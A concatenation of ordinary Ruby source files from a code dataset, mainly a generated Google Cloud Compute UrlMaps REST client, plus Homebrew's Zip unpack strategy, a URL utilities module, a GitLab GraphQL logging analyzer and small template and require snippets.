#
# @param request [::Google::Cloud::Compute::V1::DeleteUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload delete(project: nil, request_id: nil, url_map: nil)
# Pass arguments to `delete` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map [::String]
# Name of the UrlMap resource to delete.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def delete request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::DeleteUrlMapRequest

  # Converts hash and nil to an options object
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Customize the options with defaults
  call_metadata = {}

  # Set x-goog-api-client header
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Compute::V1::VERSION,
    transports_version_send: [:rest]

  options.apply_defaults timeout: @config.timeout,
                         metadata: call_metadata

  @url_maps_stub.delete request, options do |result, response|
    yield result, response if block_given?
    # `return` (not `next`) intentionally exits the whole method with the
    # result, even when a caller-supplied block was given.
    return result
  end
rescue ::Faraday::Error => e
  # Translate transport-level Faraday failures into the canonical
  # Google::Cloud::Error hierarchy.
  gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
  raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Returns the specified UrlMap resource. Gets a list of available URL maps by making a list() request.
#
# @overload get(request, options = nil)
# Pass arguments to `get` via a request object, either of type
# {::Google::Cloud::Compute::V1::GetUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::GetUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload get(project: nil, url_map: nil)
# Pass arguments to `get` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param url_map [::String]
# Name of the UrlMap resource to return.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::UrlMap]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::UrlMap]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def get request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::GetUrlMapRequest

  # Converts hash and nil to an options object
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Customize the options with defaults
  call_metadata = {}

  # Set x-goog-api-client header
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Compute::V1::VERSION,
    transports_version_send: [:rest]

  options.apply_defaults timeout: @config.timeout,
                         metadata: call_metadata

  @url_maps_stub.get request, options do |result, response|
    yield result, response if block_given?
    # `return` (not `next`) intentionally exits the whole method with the
    # result, even when a caller-supplied block was given.
    return result
  end
rescue ::Faraday::Error => e
  # Translate transport-level Faraday failures into the canonical
  # Google::Cloud::Error hierarchy.
  gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
  raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Creates a UrlMap resource in the specified project using the data included in the request.
#
# @overload insert(request, options = nil)
# Pass arguments to `insert` via a request object, either of type
# {::Google::Cloud::Compute::V1::InsertUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::InsertUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload insert(project: nil, request_id: nil, url_map_resource: nil)
# Pass arguments to `insert` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map_resource [::Google::Cloud::Compute::V1::UrlMap, ::Hash]
# The body resource for this request
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def insert request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::InsertUrlMapRequest

  # Converts hash and nil to an options object
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Customize the options with defaults
  call_metadata = {}

  # Set x-goog-api-client header
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Compute::V1::VERSION,
    transports_version_send: [:rest]

  options.apply_defaults timeout: @config.timeout,
                         metadata: call_metadata

  @url_maps_stub.insert request, options do |result, response|
    yield result, response if block_given?
    # `return` (not `next`) intentionally exits the whole method with the
    # result, even when a caller-supplied block was given.
    return result
  end
rescue ::Faraday::Error => e
  # Translate transport-level Faraday failures into the canonical
  # Google::Cloud::Error hierarchy.
  gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
  raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Initiates a cache invalidation operation, invalidating the specified path, scoped to the specified UrlMap.
#
# For more information, see [Invalidating cached content](/cdn/docs/invalidating-cached-content).
#
# @overload invalidate_cache(request, options = nil)
# Pass arguments to `invalidate_cache` via a request object, either of type
# {::Google::Cloud::Compute::V1::InvalidateCacheUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::InvalidateCacheUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload invalidate_cache(cache_invalidation_rule_resource: nil, project: nil, request_id: nil, url_map: nil)
# Pass arguments to `invalidate_cache` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param cache_invalidation_rule_resource [::Google::Cloud::Compute::V1::CacheInvalidationRule, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map [::String]
# Name of the UrlMap scoping this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def invalidate_cache request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::InvalidateCacheUrlMapRequest

  # Converts hash and nil to an options object
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Customize the options with defaults
  call_metadata = {}

  # Set x-goog-api-client header
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Compute::V1::VERSION,
    transports_version_send: [:rest]

  options.apply_defaults timeout: @config.timeout,
                         metadata: call_metadata

  @url_maps_stub.invalidate_cache request, options do |result, response|
    yield result, response if block_given?
    # `return` (not `next`) intentionally exits the whole method with the
    # result, even when a caller-supplied block was given.
    return result
  end
rescue ::Faraday::Error => e
  # Translate transport-level Faraday failures into the canonical
  # Google::Cloud::Error hierarchy.
  gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
  raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Retrieves the list of UrlMap resources available to the specified project.
#
# @overload list(request, options = nil)
# Pass arguments to `list` via a request object, either of type
# {::Google::Cloud::Compute::V1::ListUrlMapsRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ListUrlMapsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload list(filter: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil)
# Pass arguments to `list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Gapic::Rest::PagedEnumerable<::Google::Cloud::Compute::V1::UrlMap>]
# @yieldparam response [::Faraday::Response]
#
# @return [::Gapic::Rest::PagedEnumerable<::Google::Cloud::Compute::V1::UrlMap>]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
# REST call wrapper generated by GAPIC. Same shape as the other methods of
# this service, except the raw page is wrapped in a PagedEnumerable so
# callers can iterate across result pages transparently.
def list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ListUrlMapsRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.list request, options do |result, response|
# Paginate over the "items" field of ListUrlMapsResponse.
result = ::Gapic::Rest::PagedEnumerable.new @url_maps_stub, :list, "items", request, result, options
yield result, response if block_given?
# Non-local return: exits `list` with the paged enumerable.
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Patches the specified UrlMap resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
#
# @overload patch(request, options = nil)
# Pass arguments to `patch` via a request object, either of type
# {::Google::Cloud::Compute::V1::PatchUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::PatchUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload patch(project: nil, request_id: nil, url_map: nil, url_map_resource: nil)
# Pass arguments to `patch` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map [::String]
# Name of the UrlMap resource to patch.
# @param url_map_resource [::Google::Cloud::Compute::V1::UrlMap, ::Hash]
# The body resource for this request
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
# REST call wrapper generated by GAPIC for the UrlMaps.Patch RPC
# (JSON merge-patch semantics; see the preceding YARD block).
def patch request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::PatchUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.patch request, options do |result, response|
yield result, response if block_given?
# Non-local return: exits `patch` with the stub's Operation result.
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Updates the specified UrlMap resource with the data included in the request.
#
# @overload update(request, options = nil)
# Pass arguments to `update` via a request object, either of type
# {::Google::Cloud::Compute::V1::UpdateUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::UpdateUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload update(project: nil, request_id: nil, url_map: nil, url_map_resource: nil)
# Pass arguments to `update` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map [::String]
# Name of the UrlMap resource to update.
# @param url_map_resource [::Google::Cloud::Compute::V1::UrlMap, ::Hash]
# The body resource for this request
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
# REST call wrapper generated by GAPIC for the UrlMaps.Update RPC
# (full-resource replacement; see the preceding YARD block).
def update request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::UpdateUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.update request, options do |result, response|
yield result, response if block_given?
# Non-local return: exits `update` with the stub's Operation result.
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Runs static validation for the UrlMap. In particular, the tests of the provided UrlMap will be run. Calling this method does NOT create the UrlMap.
#
# @overload validate(request, options = nil)
# Pass arguments to `validate` via a request object, either of type
# {::Google::Cloud::Compute::V1::ValidateUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ValidateUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload validate(project: nil, url_map: nil, url_maps_validate_request_resource: nil)
# Pass arguments to `validate` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param url_map [::String]
# Name of the UrlMap resource to be validated as.
# @param url_maps_validate_request_resource [::Google::Cloud::Compute::V1::UrlMapsValidateRequest, ::Hash]
# The body resource for this request
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::UrlMapsValidateResponse]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::UrlMapsValidateResponse]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
# REST call wrapper generated by GAPIC for the UrlMaps.Validate RPC.
# Runs static validation of a UrlMap without creating it (see YARD above).
def validate request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ValidateUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.validate request, options do |result, response|
yield result, response if block_given?
# Non-local return: exits `validate` with the validation response.
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Configuration class for the UrlMaps REST API.
#
# This class represents the configuration for UrlMaps REST,
# providing control over credentials, timeouts, retry behavior, logging.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# # Examples
#
# To modify the global config, setting the timeout for all calls to 10 seconds:
#
# ::Google::Cloud::Compute::V1::UrlMaps::Client.configure do |config|
# config.timeout = 10.0
# end
#
# To apply the above configuration only to a new client:
#
# client = ::Google::Cloud::Compute::V1::UrlMaps::Client.new do |config|
# config.timeout = 10.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"compute.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
#
# Configuration holder for the UrlMaps REST client; attributes are
# documented in the YARD block immediately above this class.
class Configuration
extend ::Gapic::Config
# Default service endpoint; override e.g. for private or regional endpoints.
config_attr :endpoint, "compute.googleapis.com", ::String
config_attr :credentials, nil do |value|
# Validation block: accept any of the credential representations
# enumerated in the class-level docs above.
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr :timeout, nil, ::Numeric, nil
# @private
def initialize parent_config = nil
# Unset attributes fall back to the parent (e.g. global) configuration.
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
end
end
end
end
end
end
end
end
| 60.924096 | 477 | 0.582336 |
33c0cb52a8cf001e82c05b75980b9be897119eaa | 139 | <%= boiler_plate %>
card = Balanced::Card.fetch('<%= request['card_href'] %>')
card.debit(
<%= params_to_hash.call(payload).indent(2) %>
)
| 23.166667 | 58 | 0.647482 |
4aaf225f18f17f2b4bf2ad290864b11391eb270a | 1,788 | # frozen_string_literal: true
module UnpackStrategy
class Zip
# Prepended module: wraps the base extract_to_dir (reachable via `super`)
# with macOS-specific handling for extended attributes and volume labels.
prepend Module.new {
def extract_to_dir(unpack_dir, basename:, verbose:)
if merge_xattrs && contains_extended_attributes?(path)
# We use ditto directly, because dot_clean has issues if the __MACOSX
# folder has incorrect permissions.
# (Also, Homebrew's ZIP artifact automatically deletes this folder.)
return system_command! "ditto",
args: ["-x", "-k", path, unpack_dir],
verbose: verbose,
print_stderr: false
end
result = begin
super
rescue ErrorDuringExecution => e
# Re-raise anything other than a corrupt/missing central directory;
# for that specific unzip failure, fall back to ditto and bail out.
raise unless e.stderr.include?("End-of-central-directory signature not found.")
system_command! "ditto",
args: ["-x", "-k", path, unpack_dir],
verbose: verbose
return
end
# Collect entries that unzip skipped because they were volume labels.
volumes = result.stderr.chomp
.split("\n")
.map { |l| l[/\A skipping: (.+) volume label\Z/, 1] }
.compact
return if volumes.empty?
Dir.mktmpdir do |tmp_unpack_dir|
tmp_unpack_dir = Pathname(tmp_unpack_dir)
# `ditto` keeps Finder attributes intact and does not skip volume labels
# like `unzip` does, which can prevent disk images from being unzipped.
system_command! "ditto",
args: ["-x", "-k", path, tmp_unpack_dir],
verbose: verbose
# Move only the previously skipped volume-label entries into place.
volumes.each do |volume|
FileUtils.mv tmp_unpack_dir/volume, unpack_dir/volume, verbose: verbose
end
end
end
}
end
end
| 34.384615 | 89 | 0.534116 |
# Small collection of URL/URI manipulation helpers.
module URLUtils
  module_function

  # Returns url_str with `param_key=param_val` appended to its query string.
  def append_query_param(url_str, param_key, param_val)
    parsed = URI(url_str)
    pairs = URI.decode_www_form(parsed.query || "")
    pairs.push([param_key, param_val])
    parsed.query = URI.encode_www_form(pairs)
    parsed.to_s
  end

  # Returns url_str with every occurrence of param_key removed from the
  # query string; drops the "?" entirely when no parameters remain.
  def remove_query_param(url_str, param_key)
    parsed = URI(url_str)
    remaining = URI.decode_www_form(parsed.query || "").reject { |(k, _v)| k == param_key }
    parsed.query = remaining.empty? ? nil : URI.encode_www_form(remaining)
    parsed.to_s
  end

  # Inserts `component` as the first path segment of the URL.
  def prepend_path_component(url_str, component)
    parsed = URI(url_str)
    parsed.path = ["/", component, parsed.path].join
    parsed.to_s
  end

  # Takes a base_url with no query parameters but with scheme included
  # and a params hash. Returns a full uri str with query
  # params. Params with nil values are dropped.
  def build_url(base_url, params)
    parsed = URI(base_url)
    parsed.query = URI.encode_www_form(HashUtils.compact(params))
    parsed.to_s
  end

  # http://www.sharetribe.com/en/people -> en
  # http://www.sharetribe.com/en-US/people -> en-US
  #
  # Returns the first "folder" in path. Does not validate the locale
  def extract_locale_from_url(url)
    segments = URI(url).path.split('/')
    segments[1]
  end

  # www.sharetribe.com => www.sharetribe.com
  # www.sharetribe.com:3000 => www.sharetribe.com
  def strip_port_from_host(host)
    portless = host.split(":").first
    portless
  end

  # Naive join method, which can be used to normalize multiple slashes
  #
  # Usage: URLUtils.join("foo", "bar/", "baz") => "foo/bar/baz"
  def join(*parts)
    File.join(*parts.reject(&:blank?))
  end
end
| 28.759259 | 86 | 0.679974 |
01b55a1667f5da239bf7c709a7e2a5492932ea20 | 1,991 | # frozen_string_literal: true
module Gitlab
module Graphql
module QueryAnalyzers
# GraphQL query analyzer that logs each query's string, variables,
# complexity, depth and duration via GraphqlLogger.
class LoggerAnalyzer
COMPLEXITY_ANALYZER = GraphQL::Analysis::QueryComplexity.new { |query, complexity_value| complexity_value }
DEPTH_ANALYZER = GraphQL::Analysis::QueryDepth.new { |query, depth_value| depth_value }
# Analyzer is active only when the feature flag is enabled.
def analyze?(query)
Feature.enabled?(:graphql_logging, default_enabled: true)
end
# Builds the memo passed through the analysis; falls back to the bare
# defaults (and reports to Sentry) if variable processing blows up.
def initial_value(query)
variables = process_variables(query.provided_variables)
default_initial_values(query).merge({
query_string: query.query_string,
variables: variables
})
rescue => e
Gitlab::Sentry.track_exception(e)
default_initial_values(query)
end
# Per-node visitor hook — nothing to accumulate here.
def call(memo, visit_type, irep_node)
memo
end
# Finalizes the memo: computes complexity/depth, stamps the duration,
# and emits the log line. Note that except! mutates the memo in place.
def final_value(memo)
return if memo.nil?
analyzers = [COMPLEXITY_ANALYZER, DEPTH_ANALYZER]
complexity, depth = GraphQL::Analysis.analyze_query(memo[:query], analyzers)
memo[:depth] = depth
memo[:complexity] = complexity
memo[:duration] = duration(memo[:time_started]).round(1)
GraphqlLogger.info(memo.except!(:time_started, :query))
rescue => e
Gitlab::Sentry.track_exception(e)
end
private
# Stringifies variables when possible so they log cleanly.
def process_variables(variables)
if variables.respond_to?(:to_s)
variables.to_s
else
variables
end
end
# NOTE(review): the local is named `nanoseconds`, but monotonic_time
# appears to return seconds, so `* 1000000` would yield microseconds —
# confirm the intended unit before relying on logged durations.
def duration(time_started)
nanoseconds = Gitlab::Metrics::System.monotonic_time - time_started
nanoseconds * 1000000
end
# Baseline memo fields; `query` is carried for final_value and later
# stripped from the logged payload.
def default_initial_values(query)
{
time_started: Gitlab::Metrics::System.monotonic_time,
query_string: nil,
query: query,
variables: nil,
duration: nil
}
end
end
end
end
end
| 27.652778 | 115 | 0.599196 |
33e39261493eee79ff35469802e3f7720c40f663 | 241 | require 'asciidoctor/extensions'
require_relative 'pikchr/extension'
